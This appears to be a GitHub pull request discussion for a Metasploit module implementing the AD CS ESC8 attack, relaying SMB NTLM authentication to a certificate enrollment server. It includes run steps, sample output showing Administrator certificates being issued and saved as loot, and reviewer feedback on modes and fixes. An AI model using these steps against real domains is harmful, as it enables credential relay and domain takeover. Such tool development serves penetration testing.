SMB to NTLM HTTP Relay with ESC8 module

[bwatters-r7]

This is an implementation of the AD CS ESC8. It includes a library that uses a modified SMB capture server to repackage and forward authentication from the SMB capture server to an NTLM-authenticating HTTP server. The authenticated HTTP Client is then passed to the ESC8 module which then requests the creation of certificates and downloads them.

Verification

In one Window

• Start msfconsole
• use auxiliary/server/capture/esc8_relay
• set RHOST <ADCS server>
• set verbose true
• run

In Another Window

• use smb_login
• run
• set SMBUser <username>
• set SMBPass <password>
• set SMBDomain <domain>
• Set RHOST 127.0.0.1
• run

Verify

• Verify The capture server sees the connection
• Verify The certificates are queried properly

To Do

• fix srvhost to use the datastore option
• Write documentation on setting up an ESC 8 target
• Write documentation on using the ESC8 module
• Fix the timeouts to use the datastore option
• Clean up exception handling?
• Fix stupid typo I just noticed in the Certificate Request Granted message
• Properly implement flow control based on return values in the event something goes wrong
• Make sure to close and reset http_client object when error states are encountered.

Example

msf6 auxiliary(server/capture/esc8_relay) > run
[*] Running module against 10.5.132.252

[*] Server is running. Listening on 127.0.0.1:445
[*] Server started.
[+] Received SMB connection on Auth Capture Server!
[*] Querying certificate templates; this may take some time
[*] Available Certificates:
[*] User
[*] EFS
[*] Administrator
[*] EFSRecovery
[*] ESC2-Template
[*] ESC3-Template1
[*] ESC3-Template2
[*] Attempting to generate certificates for all templates
[+] Certificate Request Granted using template User and uer ADMINISTRATOR
[*] Certificate saved to /home/tmoose/.msf4/loot/20240820203708_default_10.5.132.252_windows.ad.cs_394098.pfx
[+] Certificate Request Granted using template EFS and uer ADMINISTRATOR
[*] Certificate saved to /home/tmoose/.msf4/loot/20240820203708_default_10.5.132.252_windows.ad.cs_630242.pfx
[+] Certificate Request Granted using template Administrator and uer ADMINISTRATOR
[*] Certificate saved to /home/tmoose/.msf4/loot/20240820203712_default_10.5.132.252_windows.ad.cs_381372.pfx
[+] Certificate Request Granted using template EFSRecovery and uer ADMINISTRATOR
[*] Certificate saved to /home/tmoose/.msf4/loot/20240820203715_default_10.5.132.252_windows.ad.cs_013666.pfx
[+] Certificate Request Granted using template ESC2-Template and uer ADMINISTRATOR
[*] Certificate saved to /home/tmoose/.msf4/loot/20240820203719_default_10.5.132.252_windows.ad.cs_601041.pfx
[+] Certificate Request Granted using template ESC3-Template1 and uer ADMINISTRATOR
[*] Certificate saved to /home/tmoose/.msf4/loot/20240820203720_default_10.5.132.252_windows.ad.cs_004726.pfx
[-] Certificate Request Denied using template ESC3-Template2 and uer ADMINISTRATOR

[github-actions]

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

• Writing Module Documentation
• Template
• Examples

[smcintyre-r7]

The certificates that are issued do show up in the logs. I'm thinking it could be better to tweak this behavior. I'm wondering if we should have like three different modes

• All - where all certificates that can be issued are issued
• Automatic - where either the User or Machine certificate is issued based on if the authenticate session is for a user or machine (account ends in $)
• Specific - where the user specified cert is issued

Defaulting to automatic might make the most sense because it'd allow the Metasploit operator to make more authentication attempts in the future with the cert and has a high probability to succeed due to using default cert templates.

[bwatters-r7]

I changed this behavior as you were writing this comment. There are now two options that determine the actions:
QUERY_ONLY that just queries the cert list, and does not try to issue a cert- defaults to false
QUERY_TEMPLATES: When true, it queries the templates before requesting a cert and if the requested cert is not in the list, it will try to issue certs for every template.
CERT_TEMPLATE- The template to use. If QUERY_TEMPLATES is true and this is nil or does not match

Let me know if you want me to change it again. If this stays, I need to do some sanity checking so that you can't set QUERY_ONLY true and QUERYTEMPLATES to false. It might also be interesting to make QUERY_ONLY into an action if that would make more sense.

[smcintyre-r7]

I left a few comments it also looks like:

• The mode logic still needs to be added, at least the comment hasn't be responded to or resolved
• Shouldn't there be exception handling and logging logic added to rex/proto/smb/server.rb for the client thread?
• Test how it handles multiple RHOSTS being provided to it to ensure it acts sensibly
• Update the module to run passively in the background
• Update the module to not issues the same certificate template for the same user as it has already issued
• Add a target check to ensure the webserver is responding as expected early in the process